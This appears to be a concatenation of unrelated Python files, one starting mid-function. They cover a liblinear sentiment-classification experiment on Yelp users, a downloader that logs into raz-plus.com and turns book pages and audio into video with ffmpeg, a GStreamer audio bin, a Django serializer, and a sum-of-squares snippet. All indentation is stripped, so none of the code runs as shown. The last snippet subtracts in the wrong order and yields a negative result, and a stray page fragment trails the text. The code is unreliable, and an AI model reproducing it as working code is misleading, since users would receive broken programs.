with open(result_file, 'w') as fw:
with open(full_result_file, 'r') as fr:
line = fr.readline()
while line:
fw.write('%s' % (line))
line = fr.readline()
if not os.path.isfile(result_file):
if not os.path.isfile(model_file):
if not os.path.isfile(random_train_file):
random_index = np.random.permutation(total)
random_index = set(random_index[0:int(total * factor)])
if not os.path.isfile(random_train_file):
with open(random_train_file, 'w') as fw:
with open(format_train_file, 'r') as fr:
for l, line in enumerate(fr):
if l in random_index:
fw.write(line)
command = '../liblinear/train -n %d -c %f %s %s > /dev/null' % (
num_cores, para_c, random_train_file, model_file)
print(command)
os.system(command)
os.remove(random_train_file)
command = '../liblinear/predict %s %s /dev/null | tee %s' % (
format_test_file, model_file, result_file)
print(command)
os.system(command)
with open(result_file, 'r') as f:
accuracy_array[i][r] = float(f.readline().split()[-2][:-1])
# os.remove(format_test_file)
return accuracy_array
def store_std_mean(accuracy_array, model_type, factor, yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
factor_str = str(factor)
factor_index = factor_str.index('.')
factor_str = factor_str[0:factor_index] + \
'p' + factor_str[factor_index + 1:]
head_std = np.std(accuracy_array[0])
head_mean = np.mean(accuracy_array[0])
tail_std = np.std(accuracy_array[1])
tail_mean = np.mean(accuracy_array[1])
# print('model_type: %s\tyelp_round: %d\tlambda: %f\tr: %f\talpha: %f\n' % (model_type, yelp_round, para_lambda, para_r, para_alpha))
# print('\thead_std: %f' % head_std)
# print('\thead_mean: %f' % head_mean)
# print('\ttail_std: %f' % tail_std)
# print('\ttail_mean: %f' % tail_mean)
if model_type == 'w2v':
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_f%s.txt' % (
model_type, yelp_round, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_f%s.txt' % (
model_type, yelp_round, factor_str))
elif model_type == 'swe':
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, factor_str))
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, factor_str))
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, factor_str))
elif model_type.startswith('swe_with_bias_randomwalk'):
std_file = os.path.join(result_path, '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str))
mean_file = os.path.join(result_path, '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s_f%s.txt' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str, factor_str))
with open(std_file, 'w') as f:
f.write('head_std: %f\n' % head_std)
f.write('tail_std: %f\n' % tail_std)
with open(mean_file, 'w') as f:
f.write('head_mean: %f\n' % head_mean)
f.write('tail_mean: %f\n' % tail_mean)
def print_results(yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight):
lambda_str = str(para_lambda)
lambda_index = lambda_str.index('.')
lambda_str = lambda_str[0:lambda_index] + \
'p' + lambda_str[lambda_index + 1:]
r_str = str(para_r)
r_index = r_str.index('.')
r_str = r_str[0:r_index] + 'p' + r_str[r_index + 1:]
p_str = str(para_p)
p_index = p_str.index('.')
p_str = p_str[0:p_index] + 'p' + p_str[p_index + 1:]
q_str = str(para_q)
q_index = q_str.index('.')
q_str = q_str[0:q_index] + 'p' + q_str[q_index + 1:]
alpha_str = str(para_alpha)
alpha_index = alpha_str.index('.')
alpha_str = alpha_str[0:alpha_index] + 'p' + alpha_str[alpha_index + 1:]
bias_weight_str = str(para_bias_weight)
bias_weight_index = bias_weight_str.index('.')
bias_weight_str = bias_weight_str[0:bias_weight_index] + \
'p' + bias_weight_str[bias_weight_index + 1:]
table_file = os.path.join(result_path, 'head_tail_result.txt')
col, row = len(factor_array), len(model_types) * 4
# head-std
# head-mean
# tail-std
# tail-mean
result_matrix = [['' for x in range(col)] for y in range(row)]
head_tail_column = []
for i, model_type in enumerate(model_types):
head_tail_column.append('%s-std' % model_type)
head_tail_column.append('%s-mean' % model_type)
if model_type == 'w2v':
std_basename = '%s_head_tail_std_rd%d' % (model_type, yelp_round)
mean_basename = '%s_head_tail_mean_rd%d' % (model_type, yelp_round)
elif model_type == 'swe':
std_basename = '%s_head_tail_std_rd%d_l%s_r%s' % (
model_type, yelp_round, lambda_str, r_str)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s' % (
model_type, yelp_round, lambda_str, r_str)
elif model_type.startswith('swe_with_randomwalk') or model_type.startswith('swe_with_deepwalk'):
std_basename = '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length)
elif model_type.startswith('swe_with_node2vec') or model_type.startswith('swe_with_2nd_randomwalk'):
std_basename = '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str)
elif model_type.startswith('swe_with_bias_randomwalk'):
std_basename = '%s_head_tail_std_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str)
mean_basename = '%s_head_tail_mean_rd%d_l%s_r%s_ph%d_pl%d_p%s_q%s_a%s_bw%s' % (
model_type, yelp_round, lambda_str, r_str, para_path, para_path_length, p_str, q_str, alpha_str, bias_weight_str)
for j, factor in enumerate(factor_array):
factor_str = str(factor)
factor_index = factor_str.index('.')
factor_str = factor_str[0:factor_index] + \
'p' + factor_str[factor_index + 1:]
std_file = os.path.join(result_path, '%s_f%s.txt' %
(std_basename, factor_str))
mean_file = os.path.join(
result_path, '%s_f%s.txt' % (mean_basename, factor_str))
with open(std_file, 'r') as f:
lines = f.readlines()
result_matrix[i * 4 + 0][j] = lines[0].split()[1]
result_matrix[i * 4 + 2][j] = lines[1].split()[1]
with open(mean_file, 'r') as f:
lines = f.readlines()
result_matrix[i * 4 + 1][j] = lines[0].split()[1]
result_matrix[i * 4 + 3][j] = lines[1].split()[1]
table = PrettyTable()
table.add_column("Head", head_tail_column)
for j, f in enumerate(factor_array):
field = '%d%%' % (f * 100)
head_column = []
for i in range(len(model_types)):
head_column.append(result_matrix[4 * i + 0][j])
head_column.append(result_matrix[4 * i + 1][j])
table.add_column(field, head_column)
print('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
print(table)
table_txt = table.get_string()
with open(table_file, 'a+') as f:
f.write('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
f.write(table.get_string())
f.write('\n\n\n')
table = PrettyTable()
table.add_column("tail", head_tail_column)
for j, f in enumerate(factor_array):
field = '%d%%' % (f * 100)
tail_column = []
for i in range(len(model_types)):
tail_column.append(result_matrix[4 * i + 2][j])
tail_column.append(result_matrix[4 * i + 3][j])
table.add_column(field, tail_column)
print('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
print(table)
table_txt = table.get_string()
with open(table_file, 'a+') as f:
f.write('yelp_round: %d\tlambda: %f\tr: %f\tpath: %d\tpath_length: %d\tp: %f\tq: %f\talpha: %f\tbias_weight: %f\n' % (
yelp_round, para_lambda, para_r, para_path, para_path_length, para_p, para_q, para_alpha, para_bias_weight))
f.write(table.get_string())
f.write('\n\n\n')
#-------------------------------------------------------------
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Sentiment Classification on head and tail users using liblinear')
parser.add_argument('--yelp_round', default=9, type=int,
choices={9, 10}, help="The round number of yelp data")
parser.add_argument('--para_lambda', default=1.0, type=float,
help='The trade off parameter between log-likelihood and regularization term')
parser.add_argument('--para_r', default=1.0, type=float,
help="The constraint of the L2-norm")
parser.add_argument('--para_path', default=100, type=int,
help="The number of random walk paths for every review")
parser.add_argument('--para_path_length', default=10, type=int,
help="The length of random walk paths for every review")
parser.add_argument('--para_p', default=1.0, type=float,
help="The return parameter for the second-order random walk")
parser.add_argument('--para_q', default=1.0, type=float,
help="The in-out parameter for the second-order random walk")
parser.add_argument('--para_alpha', default=0.02, type=float,
help="The restart parameter for the bias random walk")
parser.add_argument('--para_bias_weight', default=0.2,
type=float, help="The bias parameter for the bias random walk")
args = parser.parse_args()
parser.print_help()
user_train_files = get_head_tail_review(args.yelp_round)
for model_type in model_types:
for frac in factor_array:
accuracy_array = run_SVM_frac(user_train_files, model_type, frac, args.yelp_round, args.para_lambda, args.para_r,
args.para_path, args.para_path_length, args.para_p, args.para_q, args.para_alpha, args.para_bias_weight)
store_std_mean(accuracy_array, model_type, frac, args.yelp_round, args.para_lambda, args.para_r,
args.para_path, args.para_path_length, args.para_p, args.para_q, args.para_alpha, args.para_bias_weight)
print_results(args.yelp_round, args.para_lambda, args.para_r, args.para_path,
args.para_path_length, args.para_p, args.para_q, args.para_alpha, args.para_bias_weight)
|
import re
import shutil
import subprocess
import sys
from pathlib import Path
import requests
class RazPlus(object):
def __init__(self, username, password):
self.username = username
self.passowrd = password
def login(self):
s = requests.Session()
try:
r = s.post('https://www.raz-plus.com/auth/login.php',
data={
'username': self.username,
'password': self.passowrd
},
allow_redirects=True)
if 'error' in r.url:
raise Exception('Login failed!')
if r.status_code == 200:
return s
else:
raise Exception('Bad Response!')
except Exception as e:
print(e)
exit(1)
class LVB(object):
real_mp3_list = []
def __init__(self, session, id):
self.session = session
self.id = id
def get_images_and_audios(self):
rs = self.session.get(
'https://www.raz-plus.com/projectable/book.php?id={}&lang=1&type=book'
.format(self.id))
match_displayPages = re.findall(r"var displayPages = \[.*\]", rs.text)
if re.findall(r"var bookAudioContent = {\"error\":\"invalid_book\"}",
rs.text):
raise Exception("Invalid Book")
exit(1)
page_number_list = match_displayPages[0].split('= ')[-1].strip(
'[').strip(']').strip('0,').split(',')[2:]
mp3_title = re.findall(
r"raz_.*_title_text.mp3",
rs.text)[0].split('raz_')[-1].split('_title_text.mp3')[0]
download(
'https://cf.content.raz-plus.com/raz_book_image/{}/projectable/large/1/book/page-{}.jpg',
page_number_list, self.session, self.id, 'jpg')
download(
'https://cf.content.raz-plus.com/audio/{}/raz_{}_p{}_text.mp3'.
format("{}", mp3_title.lower(),
"{}"), page_number_list, self.session, self.id, 'mp3')
def concat_audios_and_images(self):
for i in LVB.real_mp3_list:
subprocess.run(
'ffmpeg -loop 1 -i {}.jpg -i {}.mp3 -vf "pad=ceil(iw/2)*2:ceil(ih/2)*2" -c:v libx264 -x264-params keyint=1:scenecut=0 -c:a copy -shortest {}.mp4'
.format(i, i, i),
shell=True,
check=True)
def concat_videos(self):
mp4_list = []
basepath = Path('.')
files_in_basepath = (entry for entry in basepath.iterdir()
if entry.is_file())
for item in files_in_basepath:
if '.mp4' in item.name:
mp4_list.append(item.name)
for i in mp4_list:
subprocess.run(
'ffmpeg -y -i {} -filter_complex "[0:a]apad=pad_dur=2[a]" -map 0:v -map "[a]" -c:v copy _{}'
.format(i, i),
shell=True,
check=True)
mp4_list.sort(key=fn)
with open('mylist.txt', 'w') as writer:
for i in mp4_list:
writer.write("file '_{}'\n".format(i))
subprocess.run(
"ffmpeg -safe 0 -f concat -i 'mylist.txt' -c copy output.mp4",
shell=True,
check=True)
def fn(e):
return int(e.split('.')[0])
def download(url, list, session, id, type):
for i in list:
try:
r = session.get(url.format(id, i), stream=True)
if r.status_code == 200:
with open('{}.{}'.format(i, type), 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
if type == 'mp3':
LVB.real_mp3_list.append(i)
else:
print(url.format(id, i) + ": " + str(r.status_code))
except Exception as e:
print(e)
if __name__ == '__main__':
lvb_id = sys.argv[1]
lvb_username = sys.argv[2]
lvb_password = sys.argv[3]
razplus = RazPlus(lvb_username, lvb_password)
s = razplus.login()
lvb = LVB(s, lvb_id)
lvb.get_images_and_audios()
lvb.concat_audios_and_images()
lvb.concat_videos()
|
# -*- coding: utf-8 -*-
import gst
import gtk
class SongBin(gst.Bin):
def __init__(self, song_path):
gst.Bin.__init__(self)
self.source = gst.element_factory_make("filesrc", "file-source")
self.decoder = gst.element_factory_make("mad", "mp3-decoder")
self.conv = gst.element_factory_make("audioconvert", "converter")
self.source.set_property("location", song_path)
self.add(self.source, self.decoder, self.conv)
gst.element_link_many(self.source, self.decoder, self.conv)
self.src_pad = gst.GhostPad("src", self.conv.get_pad("src"))
self.add_pad(self.src_pad)
|
from .models import campaign
from rest_framework import serializers
class campaignSerializer(serializers.ModelSerializer):
class Meta:
model = campaign
fields = ['id','title','description','identifier','additionalData']
|
t, ans = list(range(1, 101)), 0
for i in t:
ans += i * i
print(ans - (sum(t) * sum(t)))
|
Subsets and Splits